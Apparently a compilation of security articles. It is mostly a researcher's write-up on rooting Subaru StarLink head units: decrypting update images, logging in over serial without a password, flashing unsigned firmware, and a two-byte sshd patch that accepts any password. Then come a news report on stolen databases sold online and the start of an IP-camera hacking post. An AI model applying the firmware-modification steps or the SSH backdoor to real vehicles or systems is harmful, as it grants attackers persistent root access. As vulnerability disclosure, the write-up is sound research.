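    # Same arithmetic as in the text: 0x210 == 10 * 0x30 + 0x30
    return 10 * d1 + d2 - 0x210


def read_salt(iso_path: str) -> int:
    """Hypothetical helper: read the salt digits from an update ISO on disk."""
    with open(iso_path, "rb") as f:
        f.seek(SALT_OFFSET)
        return parse_salt(f.read(2))


# The dump above shows the bytes 30 39 ("09") at 0x7FDE.
print(parse_salt(bytes.fromhex("3039")))
```

Subtracting 0x210 in one step is equivalent to subtracting 0x30 from each digit before weighting the first by ten, which is why both formulas in the text give the same result.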
Cluster Decryption With the new key, the aforementioned guessed decryption scheme works. IV is indeed the first chunk, followed by the authentication tag, followed by the encrypted data. 00000000 04 eb 10 90 00 60 00 01 10 43 00 18 d8 6f 17 00 |.....`...C...o..| 00000010 00 80 fa 31 c0 8e d0 bc 00 20 b8 c0 07 50 b8 36 |...1..... ...P.6| 00000020 01 50 cb 00 2b 81 00 66 90 e9 00 02 8d b4 b7 01 |.P..+..f........| 00000030 39 81 00 ff ff 04 00 93 27 08 00 3d 01 00 04 18 |9.......'..=....| 00000040 00 90 7c 26 b8 00 9b cf d7 01 19 cf 00 0d 0a 51 |..|&...........Q| 00000050 4e 58 20 76 31 2e 32 62 20 42 6f 6f 74 20 4c 6f |NX v1.2b Boot Lo| 00000060 61 64 65 72 57 00 10 55 6e 73 75 70 70 6f 72 74 |aderW..Unsupport| 00000070 65 64 20 42 49 4f 53 52 00 08 52 41 4d 20 45 72 |ed BIOSR..RAM Er| 00000080 72 6f 7e 00 09 44 69 73 6b 20 52 65 61 64 26 12 |ro~..Disk Read&.| 00000090 00 10 4d 69 73 73 69 6e 67 20 4f 53 20 49 6d 61 |..Missing OS Ima| 000000a0 67 65 52 00 07 49 6e 76 61 6c 69 64 29 13 00 29 |geR..Invalid)..)| 000000b0 17 01 06 4d 75 6c 74 69 2d 76 03 03 00 3a 20 5b |...Multi-v...: [| 0x9010eb04 is the tag for a QNX6 filesystem. Some of the strings look slightly corrupted, which is probably explained by the compression. Cluster Decompression If we go back to the binary and look for a hint, we find a great one: LOAD:0805D6D8 41 73 73 65+aAssertionFaile DCB "Assertion failed in %s@%d:e == LZO_E_OK",0 This points us, with almost absolute certainty, to lzo. Take the chunk, pass it to lzo1x_decompress_safe() via C or Python, then get the following error message: lzo.error: Compressed data violation -6 So, this isn't miniLZO? This part stumped me for a few hours as lzo1x is by far the most commonly used compression function used from the LZO library. The LZO library does provide many other options that are benchmarked in the LZO documentation — i.e., there's also LZO1, LZO1A, LZO1B, LZO1C, LZO1F, LZO1Y, etc. 
lzo1x is packaged inside of miniLZO, and is recommended as the best, hence seems to be almost the only algorithm ever used as far as I am aware. From the LZO documentation: My experiments have shown that LZO1B is good with a large blocksize or with very redundant data, LZO1F is good with a small blocksize or with binary data and that LZO1X is often the best choice of all. LZO1Y and LZO1Z are almost identical to LZO1X - they can achieve a better compression ratio on some files. Beware, your mileage may vary. I tested most of the algorithms, and only one worked: lzo1c_decompress_safe. So, why was lzo1c used? I have absolutely no idea. My guess is someone was bored one day and benchmarked several of the lzo algorithms for QNXCNDFS, or someone thought this would make it difficult to recover the actual data. This just makes decryption an annoyance as every upstream lzo package usually only implements the lzo1x algorithm. Mounting the Image After all of this, we can now decrypt and decompress all of the chunks. Concatenating the result of this gives us a binary blob that looks quite like a QNX6 filesystem. The Linux kernel can be built to mount QNX6 filesystem as read-only thanks to the work of Kai Bankett. However, if we try to mount the concatenated image, we get a superblock error. $ sudo mount -t qnx6 -o loop system.dat.dec.noextent mnt mount: /home/work/workspace/mnt: wrong fs type, bad option, bad superblock on /dev/loop7, missing codepage or helper program, or other error. The kernel module reports: [ 567.260015] qnx6: unable to read the second superblock On top of all of this, some of the header fields do not appear to match up with what we expect: raw size (dword header offset: 0x10) does not match the file size of our decrypted and decompressed blob. This almost certainly has to do with the previously ignored extents section of the QNXCNDFS file. The Extents Section Most of the QNXCNDFS file is now understood, with one exception: the extents section. 
00000200 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 00 |......... ......| 00000210 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000220 00 20 00 00 00 00 00 00 00 02 00 00 00 00 00 00 |. ..............| 00000230 80 02 00 00 00 00 00 00 00 20 00 00 00 00 00 00 |......... ......| 00000240 00 30 00 00 00 00 00 00 00 80 07 0c 00 00 00 00 |.0..............| 00000250 80 02 00 00 00 00 00 00 00 22 00 00 00 00 00 00 |........."......| 00000260 00 b0 ff 3f 00 00 00 00 00 02 00 00 00 00 00 00 |...?............| 00000270 80 0e 00 00 00 00 00 00 00 a2 07 00 00 00 00 00 |................| Low entropy again, so we can try guessing. We know the size and start of the extents section from the header. We know there are four "extents" (again from the header), hence the above is almost certainly four sets of four dwords. Searching the binary for useful strings isn't too productive. Two fields are named, but no other hints: LOAD:0805DD8C 41 73 73 65+aAssertionFaile_1 DCB "Assertion failed in %s@%d:cpos == xtnt->clstr0_pos",0 ... LOAD:0805DE2C 41 73 73 65+aAssertionFaile_2 DCB "Assertion failed in %s@%d:offset == xtnt->clstr0_off",0 So, one field may be a cluster position, the other may be some form of cluster offset. There seem to be some patterns in the data. If we assume the first dword is an address and the second dword is a length, the results look good. Extent at 0x200: Write Address: 0x00000000, Write Size: 0x00002000 Extent at 0x220: Write Address: 0x00002000, Write Size: 0x00000200 Extent at 0x240: Write Address: 0x00003000, Write Size: 0x0C078000 Extent at 0x260: Write Address: 0x3FFFB000, Write Size: 0x00000200 Adding up the write sizes gives us 0xC07A400, which matches the header field for "raw data bytes" of the file. These don't line up perfectly. The first and second extent makes sense — write address 0 + write size 0 = write address 1. What do the third and fourth dword represent? 
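The address/size reading of the first two fields can be checked quickly with a sketch like the one below. It transcribes the 128 bytes from the dump above and, as an assumption of this example, reads each 32-byte record as four little-endian 64-bit values (the upper halves are all zero in this sample, so the low dwords are the values discussed in the text). The names `parse_extents`, `field3`, and `field4` are placeholders.

```python
import struct

# Bytes 0x200-0x27F, transcribed from the hex dump above.
EXTENTS_HEX = """
00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 00
80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 20 00 00 00 00 00 00 00 02 00 00 00 00 00 00
80 02 00 00 00 00 00 00 00 20 00 00 00 00 00 00
00 30 00 00 00 00 00 00 00 80 07 0c 00 00 00 00
80 02 00 00 00 00 00 00 00 22 00 00 00 00 00 00
00 b0 ff 3f 00 00 00 00 00 02 00 00 00 00 00 00
80 0e 00 00 00 00 00 00 00 a2 07 00 00 00 00 00
"""
RECORD_SIZE = 32  # four 8-byte fields per extent (assumed layout)


def parse_extents(raw: bytes):
    """Split the extents section into (address, size, field3, field4) tuples."""
    records = []
    for off in range(0, len(raw), RECORD_SIZE):
        records.append(struct.unpack_from("<4Q", raw, off))
    return records


raw = bytes.fromhex("".join(EXTENTS_HEX.split()))
extents = parse_extents(raw)
for i, (addr, size, field3, field4) in enumerate(extents):
    print(f"Extent at 0x{0x200 + i * RECORD_SIZE:X}: "
          f"write address 0x{addr:08X}, write size 0x{size:08X}")

total = sum(size for _, size, _, _ in extents)
print(f"Sum of write sizes: 0x{total:X}")
```

The sum of the second field across all four records is what gets compared against the "raw data bytes" header value.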
Clusters are likely involved; in fact, the third dword does point to offsets that line up with cluster table entries. Dword four is a bit mysterious. To solve this, understanding the QNX6 superblock structure is helpful.
Understanding the Extents
There's a well written write-up of the QNX6 filesystem structure done by the same individual that implemented the driver in the Linux kernel. Summarizing the useful parts, there are two superblocks in the filesystem images. One is near the beginning and one is near the end. Debugging the kernel module indicates that the first superblock is correct and validates, while the second is missing or invalid. Manually calculating the second superblock address by following the source code gets us this:
//Blocksize is 1024 (0x400)
//num_blocks = 0xFFFE0
//bootblock offset =
#define QNX6_BOOTBLOCK_SIZE 0x2000
#define QNX6_SUPERBLOCK_AREA 0x1000
/* calculate second superblock blocknumber */
offset = fs32_to_cpu(sbi, sb1->sb_num_blocks) + (bootblock_offset >> s->s_blocksize_bits) + (QNX6_SUPERBLOCK_AREA >> s->s_blocksize_bits);
So the block number is 0xFFFE0 + (0x2000 >> 10) + (0x1000 >> 10), and multiplying it by the 1024-byte block size gives the byte offset: (0xFFFE0 + 8 + 4) * 1024 = 0x3FFFB000
Note that the calculated second superblock address is the same as the last extent write address. At this point, it became clear to me that the extents section is just used to "compress" large runs of zeros. The last extent is skipping a large chunk of memory and then writing out the superblock from the end of the last cluster. Thus, we can process the extents like this:
aa aa aa aa 00 00 00 00 bb bb bb bb 00 00 00 00
cc cc cc cc 00 00 00 00 dd dd dd dd 00 00 00 00
At offset 0xaaaaaaaa, write 0xbbbbbbbb bytes from offset 0xdddddddd into the cluster pointed to by cluster table entry 0xcccccccc. Or, a real example:
00000200 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 00 |......... ......|
00000210 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000220 00 20 00 00 00 00 00 00 00 02 00 00 00 00 00 00 |. ..............|
00000230 80 02 00 00 00 00 00 00 00 20 00 00 00 00 00 00 |......... ......|
00000240 00 30 00 00 00 00 00 00 00 80 07 0c 00 00 00 00 |.0..............|
00000250 80 02 00 00 00 00 00 00 00 22 00 00 00 00 00 00 |........."......|
00000260 00 b0 ff 3f 00 00 00 00 00 02 00 00 00 00 00 00 |...?............|
00000270 80 0e 00 00 00 00 00 00 00 a2 07 00 00 00 00 00 |................|
mmap a zero-filled file of header field "raw size" bytes.
At offset 0x00000000, write 0x00002000 bytes from an offset of 0x00000000 into the cluster pointed to by table entry 0x0280.
At offset 0x00002000, write 0x00000200 bytes from an offset of 0x00002000 into the cluster pointed to by table entry 0x0280.
At offset 0x00003000, write 0x0c078000 bytes from an offset of 0x00002200 into the cluster pointed to by table entry 0x0280.
At offset 0x3fffb000, write 0x00000200 bytes from an offset of 0x0007a200 into the cluster pointed to by table entry 0x0e80.
As the 0x0c078000 byte write runs off the end of the first cluster, the correct behavior is to jump to the next cluster in the table and continue reading. This simplifies the extents section.
Final Decompression
With this, we know enough to completely decompress the encrypted and compressed QNXCNDFS files and successfully mount them through the Linux QNX6 driver. This was all done via static analysis. See qdecant for a rough implementation of this, but do note that you'll have to compile your own python lzo module with one function call change for this to work. This was a quick, and woefully inefficient, script to get the files dumped as soon as possible. I would have improved it further, but you'll see later why I didn't.
system.dat
Here's a small sample of the files and directories inside of system.dat:
./bin ...
./bin/bt_test ./bin/iocupdate ./bin/awk ./bin/display_image ./bin/gles1-gears ./bin/screenshot ... ./lib ./lib/libQt53DLogic.so.5 ... ./lib/libQt53DQuick.so.5 ./etc ./etc/resolv.conf ./etc/licenseAgreement.txt ./etc/openSourceLicenses.txt ./etc/options.connmgr ./app/usr/share/prompts/waveFiles/4CH ... ./app/usr/share/trace/UISpeechService.hbtc ./app/etc/wicome/DbVersion.txt ... ./app/etc/wicome/SCP.rnf ./app/etc/speech/AudioConfig.txt ./app/share/updatestrings.json ./app/wicome ./usr ./usr/var ./usr/var/DialogManager ./usr/var/DialogManager/DynamicUserDataGrammar ./usr/var/UISS ./usr/var/UISS/speechTEFiles/sat ./dialogManager/dialog/grammar/en_US/grammarHouseBackward.fcf ... ./ifs_images ./ifs_images/sys1.ifs ./ifs_images/core1.ifs ./ifs_images/hmi1.ifs ./ifs_images/second1.ifs ./ifs_images/third1.ifs Far less than I imagined. Plenty of duplicated files we already had access to from the ISO file. The interesting find are the new ifs files at the bottom. ifs_images There are plenty of more files in the system.dat ifs images. It is always fun to look around system internals. Here are a few interesting findings: tr.cpp - Some sort of build artifact. Has something to do with mapping fonts or translation strings to the UI I believe. Hints at a dealer, factory, and engineering mode. I believe dealer and factory can be triggered with known button combinations. I am unsure how to get into engineering mode or what it even contains. "FACTORY_MODE"<<"DEALER_MODE"<<"ENGINEERING_MODE"; CarplayService.cfg - Apple apparently recommends that head units supporting Carplay not inject their own UI/functionality on top of or next to Carplay. Well done Apple and Subaru, that's always annoying. 
"Screen_Width": 800, /* March-02-2016: The Apple Spec recommended is slightly changed here as per discussion with Apple [during demo over webex] and they suggested the carplay screen to occupy full screen of HU removing the status bar [maserati icon]*/
Internal document - Found an older Microsoft Office document with what looks like company internal details (serial numbers) on various components. Mentions a number of cars in the Subaru lineup, then a codename for some sort of new Subaru North American vehicle. This is from 2016, so I'd guess that vehicle has already been announced by now. On the bright side, it didn't look very sensitive.
Overall, there was lots of stuff, but no obvious code execution mechanisms found in the brief search. I was hoping for a script that loaded code from the USB drives, some form of debugging mode with peek/poke, or anything useful. There are enough files here that I could probably keep exploring and find an avenue, but let's revisit the serial port for now.
Back to QNXCNDFS
Most of the QNXCNDFS structure is understood. Nowhere during the reverse engineering process did I find any signatures, signature verification code, or strings indicating some form of signature check taking place. However, being able to prove that there isn't a signature check is difficult through reverse engineering alone. The easiest way to prove this would be to generate our own custom QNXCNDFS image, overwrite one in the update file, and try to flash it down. If it works, great; if not, we'll probably get a new error message that will point us to another signature check we missed. As we understand the file structure, we could work backwards and create a tool to compress a QNX6 filesystem image into a QNXCNDFS file.
But we also know that the cndfs application looks to support creating QNXCNDFS files, so if we already had code-execution, we could just use that tool to create our images and skip the time-consuming step of trying to generate valid QNXCNDFS files from scratch. Both are viable options, but let's look for more flaws first. The Shadow File Here's the shadow file with the hashes replaced. root:@S@aaaaa@56c26c380d39ce15:1042473811:0:0 logger:@S@bbbbb@607cb4704d35c71b:1420070987:0:0 certifier:@S@ccccc@e0a3f6794d650876:1420137227:0:0 Three passwords I failed to crack. Here's passwd: root:x:0:0:Superuser:/:/bin/sh daemon::1:2:daemon:/: dm::2:8:dwnmgr:/: Important notes about passwd here, from the QNX manual: If the has_passwd field contains an x character, a password has been defined for this user. If no character is present, no password has been defined. and The initial_command field contains the initial command to run after the user has successfully logged in. This command and any arguments it takes must be separated by tab or space characters. As the command is spawned directly (not run by a shell), no shell expansions is performed. There is no mechanism for specifying command-line arguments that contain space or tab characters themselves. (Quoting isn't supported.) If no initial_command is specified, /bin/sh is used. So, we can potentially login over serial to daemon and dm. They have no password defined, and no initial command specified, which implies /bin/sh will be the command. Does this work? Non-privileged Code Execution Absolutely. 
$ ls
sh: ls: cannot execute - No such file or directory
$ echo $PATH
:/proc/boot:/bin:/usr/sbin:/fs/core1/core1/bin:/fs/sys1/sys1/bin:/fs/core/hmi:/fs/second1/second1/bin:/fs/third1/third1/bin:/sbin:/fs/system/bin
$ cd /fs/system/bin
$ echo *
HBFileUpload NmeCmdLine antiReadDisturbService awk bt_test cat cdqnx6fs changeIOC chkdosfs chkfsys chkqnx6fs chmod cp cypress_ctrl date dbus-send dbustracemonitor dd devb-umass devc-serusb display_image emmcvuc fdisk fs-cifs fsysinfo gles1-gears grep hd hmiHardControlReceiver hogs inetd inject iocupdate isodigest ls mediaOneTestCLI mkdir mkdosfs mkqnx6fs mtouch_inject mv netstat pcm_logger pfctl pidin ping pppd qdbc rm screenshot showmem slog2info softwareUpdate sshd sync telematicsService telnetd testTimeshift top tracelogger ulink_ctrl use watchdog-server which
$ ./cdqnx6fs
sh: ./cdqnx6fs: cannot execute - Permission denied
Unfortunately, nearly every binary is locked down to the root user. We can only navigate around via cd and dump directory contents with echo *. The good news is that when the system mounts a FAT32 USB drive, it marks every binary as 777. Thus, glob every binary we've extracted thus far into a folder on a flash drive, insert it into the head unit USB adapter, connect to dm or daemon via serial, set your $PATH to include the aforementioned folder, and then type ls.
$ ls -las /
total 201952
1 lrwxrwxrwx 1 root root 28 Jan 01 00:02 HBpersistence -> /fs/data/app/usr/share/trace
1 drwxr-xr-x 2 root root 30 May 25 2017 bin
1 drwxr-xr-x 2 root root 10 May 25 2017 dev
1 drwxr-xr-x 2 root root 20 May 25 2017 etc
0 dr-xr-xr-x 2 root root 0 Jan 01 00:02 fs
1 dr-xr-x--- 2 root 73 10 Dec 31 1969 home
0 drwxrwxr-x 8 root root 0 Jan 01 00:01 pps
201944 dr-xr-xr-x 2 root root 103395328 Jan 01 00:02 proc
1 dr-xr-x--- 2 root upd 10 Dec 31 1969 sbin
0 dr-xr-xr-x 2 root root 0 Jan 01 00:02 srv
1 lrwxrwxrwx 1 root root 10 May 25 2017 tmp -> /dev/shmem
1 drwxr-xr-x 2 root root 10 May 25 2017 usr
Local code execution via serial.
We can now execute every binary that doesn't require any sort of enhanced privileges. cdqnx6fs is one of them. $ ./cdqnx6fs ---help cdqnx6fs - condense / restore Power-Safe (QNX6) file-systems cdqnx6fs -c [(general-option | condense-option)...] src dst cdqnx6fs -r [(general-option | restore-option)...] src dst I wish I could provide some sage advice on how I solved this but it just comes down to experience. Do it enough and patterns will emerge. Image Creation Assuming cdqnx6fs works, we can now extract the system.dat (using the -r flag), mount the extracted QNX6 image in a system that supports read/write operations, modify the image in some way, flash it back down, and see if it works. If the image truly isn't signed or the verification code is broken, the flashing step will succeed. To modify the QNX6 images, we can't use the Linux driver as that only supports reading. We'll have to use an official QNX 6 test VM for full QNX6 filesystem IO. Extract the image, mount the image, add a test file in a known directory, unmount the image, transfer it back to the Harman head unit, repackage it using the correct encryption key, replace the file into the update package, flash it down, pray. The install succeeds and we can find the new file via serial. The system effectively runs unsigned code and the only "protection" against this is what looks to be an easily reverse engineered cipher. Root Escalation We can now modify system files, but the next question is, what files should we modify for root code execution? Keep in mind that the shadow file and various SSH keys are in the IFS binary blobs. So, while the best root method may be replacing the root password, that would involve more reverse engineering. We don't know the IFS file structure, and at this point, diving into yet another binary blob black box format doesn't sound enjoyable. (Someone else do it.) 
There are a large number of files not in the IFS images, but none of them are shell scripts or any sort of obvious startup script we can modify. Our options are almost all system binaries. There are an infinite number of ways to gain (network) code execution by replacing binaries, but I'll stick with what I thought of first. Let's backdoor SSH to always log us in even if the password is incorrect.
Backdooring SSH
You'd think this part would just be a web search away. Unfortunately, searching for "backdooring ssh" leads to some pretty useless parts of the Internet. Pull the source for the version of OpenSSH running on the system: it's 5.9 (check strings and you'll see OpenSSH_5.9 QNX_Secure_Shell-20120127). Browse around, try to understand the authentication process, and target a location for a patch. There were a few locations that looked good, but I started here in auth2-passwd.c:
Here's userauth_passwd:
static int
userauth_passwd(Authctxt *authctxt)
{
    char *password, *newpass;
    int authenticated = 0;
    int change;
    u_int len, newlen;

    change = packet_get_char();
    password = packet_get_string(&len);
    if (change) {
        /* discard new password from packet */
        newpass = packet_get_string(&newlen);
        memset(newpass, 0, newlen);
        xfree(newpass);
    }
    packet_check_eom();

    if (change)
        logit("password change not supported");
    else if (PRIVSEP(auth_password(authctxt, password)) == 1)
        authenticated = 1;
    memset(password, 0, len);
    xfree(password);
    return authenticated;
}
The patch should be straightforward. Instead of returning authenticated = 0 on failure, always return authenticated = 1.
Find this location in the binary by matching strings: .text:080527E6 .text:080527E6 loc_80527E6 ; CODE XREF: sub_805279C+38↑j .text:080527E6 CBZ R6, loc_80527F2 .text:080527E8 LDR R0, =aPasswordChange_0 ; "password change not supported" .text:080527EA MOVS R5, #0 .text:080527EC BL sub_806CC94 .text:080527F0 B loc_805280E .text:080527F2 ; --------------------------------------------------------------------------- .text:080527F2 .text:080527F2 loc_80527F2 ; CODE XREF: sub_805279C:loc_80527E6↑j .text:080527F2 LDR R3, =dword_808A758 .text:080527F4 MOV R0, R5 .text:080527F6 MOV R1, R4 .text:080527F8 LDR R3, [R3] .text:080527FA CBZ R3, loc_8052802 .text:080527FC BL sub_8056A18 .text:08052800 B loc_8052806 .text:08052802 ; --------------------------------------------------------------------------- .text:08052802 .text:08052802 loc_8052802 ; CODE XREF: sub_805279C+5E↑j .text:08052802 BL sub_8050778 .text:08052806 .text:08052806 loc_8052806 ; CODE XREF: sub_805279C+64↑j .text:08052806 SUBS R3, R0, #1 .text:08052808 NEGS R0, R3 .text:0805280A ADCS R0, R3 .text:0805280C MOV R5, R0 .text:0805280E .text:0805280E loc_805280E ; CODE XREF: sub_805279C+54↑j .text:0805280E MOVS R1, #0 ; c .text:08052810 LDR R2, [SP,#0x28+var_24] ; n .text:08052812 MOV R0, R4 ; s .text:08052814 BLX memset .text:08052818 MOV R0, R4 .text:0805281A BL sub_8072DB0 .text:0805281E LDR R3, =__stack_chk_guard .text:08052820 LDR R2, [SP,#0x28+var_1C] .text:08052822 MOV R0, R5 .text:08052824 LDR R3, [R3] .text:08052826 CMP R2, R3 .text:08052828 BEQ loc_805282E .text:0805282A BLX __stack_chk_fail .text:0805282E ; --------------------------------------------------------------------------- .text:0805282E .text:0805282E loc_805282E ; CODE XREF: sub_805279C+8C↑j .text:0805282E ADD SP, SP, #0x14 .text:08052830 POP {R4-R7,PC} R0 is our return value in ARM, and will contain the value of authenticated on subroutine exit. 
The write to R0 is:
.text:08052822 28 46 MOV R0, R5
Change this to return authenticated = 1;, which is going to be this in ASM:
.text:08052822 01 20 MOVS R0, #1
Thus, 28 46 -> 01 20. Not the best backdoor possible, but it works.
$ ssh root@192.168.0.1
****************************** SUBARU *******************************
Warning - You are knowingly accessing a secured system. That means you are liable for any mischeif you do.
*********************************************************************
root@192.168.0.1's password:
# uname -a
QNX localhost 6.6.0 2016/09/07-09:25:33CDT i.MX6S_Subaru_Gen3_ED2_Board armle
# cat /etc/shadow
root:@S@aaaaaa@56c26c380d39ce15:1042473811:0:0
logger:@S@bbbbbb@607cb4704d35c71b:1420070987:0:0
certifier:@S@cccccc@e0a3f6794d650876:1420137227:0:0
# pidin -F "%n %U %V %W %X %Y %Z" | grep sh
usr/sbin/sshd 0 0 0 0 0 0
usr/sbin/sshd 0 0 0 0 0 0
bin/sh 0 0 0 0 0 0
Putting it All Together
To root any 2017+ Subaru StarLink head unit, an attacker needs the following to generate valid update images:
A Subaru head unit with serial and USB port access.
The encryption keys for the update files.
An official update. These seem to be available for most platforms in many different ways. Without the official update, the ISO signature check will fail and the install will not continue to the stage where the QNXCNDFS files are written.
Physical access to the vehicle's USB ports.
Technically, the head unit isn't needed, but to replace it you'd need code to generate QNXCNDFS images from QNX6 filesystem images.
After we have those pieces:
Use the serial and USB ports to gain local code execution on the system.
Decondense an official software update QNXCNDFS image.
Use the QNX Platform VM Image to modify the QNX6 filesystem.
Inject some form of backdoor (sshd in this case).
Re-package the update file via cndfs.
Replace the modified QNXCNDFS file in the official system update.
Install.
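For reference, the two-byte sshd patch from the Backdooring SSH section (28 46 -> 01 20) can be expressed as a small, checked byte replacement. This is a minimal sketch rather than the tooling actually used: `thumb_movs_imm8` and `patch_bytes` are names invented here, the file offset of the instruction inside the sshd binary is not given in the write-up and would have to be worked out from the ELF layout, and the demo buffer is placeholder data.

```python
import struct


def thumb_movs_imm8(rd: int, imm8: int) -> bytes:
    """Encode the 16-bit Thumb instruction 'MOVS Rd, #imm8' as little-endian bytes."""
    if not (0 <= rd <= 7 and 0 <= imm8 <= 0xFF):
        raise ValueError("rd must be R0-R7 and imm8 must fit in 8 bits")
    return struct.pack("<H", 0x2000 | (rd << 8) | imm8)


def patch_bytes(image: bytes, offset: int, old: bytes, new: bytes) -> bytes:
    """Replace old with new at offset, refusing to patch if the bytes differ."""
    if len(old) != len(new):
        raise ValueError("patch must not change the size of the binary")
    if image[offset:offset + len(old)] != old:
        raise ValueError("unexpected bytes at offset; wrong binary or offset?")
    return image[:offset] + new + image[offset + len(new):]


OLD = bytes.fromhex("2846")   # MOV R0, R5 (return the real result)
NEW = thumb_movs_imm8(0, 1)   # MOVS R0, #1 (always report success)

# Placeholder buffer standing in for the bytes around 0x08052822.
demo = bytes.fromhex("0d49") + OLD + bytes.fromhex("1b68")
patched = patch_bytes(demo, 2, OLD, NEW)
print(patched.hex())
```

Verifying the original bytes before writing is the main design point: it prevents silently corrupting a different sshd build where the instruction sits elsewhere.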
While this may seem like an excessive number of steps to gain code execution, keep in mind an attacker would only need to do this once and then could conceivably generate valid updates for other platforms. Valid update images were initially challenging to find, but it appears that Subaru is now releasing these via a map-update application that can be used if you have a valid VIN. I will not be releasing modified update files and I wouldn't recommend doing this to your own car.
CVE-2018-18203
A vulnerability in the update mechanism of Subaru StarLink head units 2017, 2018, and 2019 may give an attacker (with physical access to the vehicle's USB ports) the ability to rewrite the firmware of the head unit. This vulnerability is due to bugs in the signature checking implementation used when verifying specific update files. An attacker could potentially install persistent malicious head unit firmware and execute arbitrary code as the root user.
Next Steps
After all of this, I still know very little about the Harman head unit system, but I do know how to root them. Reverse engineering QNXCNDFS wasn't required, but was an interesting avenue to explore and may help other researchers in the future. The next step is far less tedious than reversing filesystem containers: explore the system, see what hidden functionality exists (Andromeda is probably a goldmine, map out dbus), set up a cross-compiler, and so on.
Notes from Subaru and Harman
Both Subaru and Harman wanted to relay messages about the flaw in this write-up. I have paraphrased them below. If you have questions, please contact either Subaru or Harman directly.
Note from Subaru
Subaru will have updates for head units affected by this flaw in the coming weeks.
Note from Harman
The firmware update process attempted to verify the authenticity of the QNXCNDFS dat files. The procedure in question had a bug in it that caused unsigned images to verify as "valid", which allowed for unsigned code installation.
Conclusion
I started this in my free time in July of 2018 and finished early the next month. Overall, the process took less than 100 hours. The embargo was originally scheduled for 90 days, which would have been November 5th, 2018. Subaru requested more time before the original embargo ended and I agreed to extend it until the end of November.
I was unable to find any sort of responsible/coordinated disclosure form on Harman or Subaru's websites. That was disappointing as Harman seems to have plenty of sales pages detailing their security programs and systems. I did manage to find a Harman security engineer on LinkedIn who did an excellent job handling the incident. Thank you!
Harman and Subaru should not assume that the biggest flaw is releasing update files. Letting customers update their own head units is wonderful, and it lets security researchers find flaws and report them. Giving the updates exclusively to dealers prevents the good guys from finding bugs. Nation states and organized crime would certainly not have trouble gaining access to firmware and software updates.
If anyone affiliated with education or some other useful endeavor would like the head unit, I'll be happy to ship it assuming you pay the shipping costs and agree to never install this in a vehicle.
Thank you to those I worked with at Harman, especially Josiah Bruner, and to Subaru for making a great car.
Questions, comments, complaints? github.scott@gmail.com
Source: https://github.com/sgayou/subaru-starlink-research/blob/master/doc/README.md#jailbreaking-subaru-starlink
Hacker Breaches Dozens of Sites, Puts 127 Million New Records Up for Sale
February 15, 2019 Swati Khandelwal
A hacker who was selling details of nearly 620 million online accounts stolen from 16 popular websites has now put up a second batch of 127 million records originating from 8 other sites for sale on the dark web. Last week, The Hacker News received an email from a Pakistani hacker who claims to have hacked dozens of popular websites (listed below) and to be selling their stolen databases online. During an interview with The Hacker News, the hacker also claimed that many targeted companies probably have no idea that they have been compromised and that their customers' data has already been sold to multiple cyber criminal groups and individuals.
Package 1: Databases From 16 Compromised Websites On Sale
In the first round, the hacker, who goes by the online alias "gnosticplayers", was selling details of 617 million accounts belonging to the following 16 compromised websites for less than $20,000 in Bitcoin on dark web marketplace Dream Market:
Dubsmash: 162 million accounts
MyFitnessPal: 151 million accounts
MyHeritage: 92 million accounts
ShareThis: 41 million accounts
HauteLook: 28 million accounts
Animoto: 25 million accounts
EyeEm: 22 million accounts
8fit: 20 million accounts
Whitepages: 18 million accounts
Fotolog: 16 million accounts
500px: 15 million accounts
Armor Games: 11 million accounts
BookMate: 8 million accounts
CoffeeMeetsBagel: 6 million accounts
Artsy: 1 million accounts
DataCamp: 700,000 accounts
Out of these, the popular photo-sharing service 500px has confirmed that the company suffered a data breach in July last year and that personal data, including full names, usernames, email addresses, password hashes, location, birth date, and gender, for all of the roughly 14.8 million users that existed at the time was exposed online.
Just yesterday, Artsy, DataCamp and CoffeeMeetsBagel also confirmed that the companies were victims of a breach last year and that personal and account details of their customers were stolen by an unauthorized attacker. Diet tracking service MyFitnessPal, online genealogy platform MyHeritage and cloud-based video maker service Animoto had confirmed the data breaches last year. In response to the news, video-sharing app Dubsmash also issued a notice informing its users that it has launched an investigation and contacted law enforcement to look into the matter.
Package 2: Hacked Databases From 8 More Websites On Sale
While putting the second round of the stolen accounts up for sale on the Dream Market, one of the largest dark web marketplaces for illegal narcotics and drug paraphernalia, the hacker removed the collection of the first round to keep it from being leaked and ending up in security initiatives like Google's new Password Checkup tool. Gnosticplayers told The Hacker News in an email that the second round listed stolen data from 127 million accounts that belonged to the following 8 hacked websites, which was up for sale for $14,500 in bitcoin:
Houzz: 57 million accounts
YouNow: 40 million accounts
Ixigo: 18 million accounts
Stronghold Kingdoms: 5 million accounts
Roll20.net: 4 million accounts
Ge.tt: 1.83 million accounts
Petflow and Vbulletin forum: 1.5 million accounts
Coinmama (Cryptocurrency Exchange): 420,000 accounts
Of the above-listed websites, only Houzz has confirmed the security breach, disclosing earlier this month that it compromised its customers' public information and certain internal account information. Like the first round, the recent collection of 127 million stolen accounts has also been removed from sale on the dark web.
Though some of the services are resetting users' passwords after confirming that their data was stolen, if you are a user of any of the above-listed services, you should consider changing your passwords in case you reused the same password across different websites.
Source: https://thehackernews.com/2019/02/data-breach-website.html?m=1
-
Maurits van Altvorst Achieving remote code execution on a Chinese IP camera February 14, 2019 Background Cheap Chinese Internet of Things devices are on the rise. Unfortunately, security on these devices is often an afterthought. I recently got my hands on an “Alecto DVC-155IP” IP camera. It has Wi-Fi, night vision, two-axis tilt and yaw control, motion sensing and more. My expectations regarding security were low, but this camera was still able to surprise me. Setting up the camera Setting up the camera using the app was a breeze. I had to enter my Wi-Fi details, a name for the camera and a password. Nothing too interesting so far. Using Nmap on the camera gave me the following results: ➜ ~ nmap -A 192.168.178.59 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-09 12:59 CET Nmap scan report for 192.168.178.59 Host is up (0.010s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 23/tcp open telnet BusyBox telnetd 80/tcp open http thttpd 2.25b 29dec2003 |_http-server-header: thttpd/2.25b 29dec2003 |_http-title: Site doesn't have a title (text/html; charset=utf-8). 554/tcp open rtsp HiLinux IP camera rtspd V100R003 (VodServer 1.0.0) |_rtsp-methods: OPTIONS, DESCRIBE, SETUP, TEARDOWN, PLAY Service Info: Host: RT-IPC; Device: webcam Three open ports: 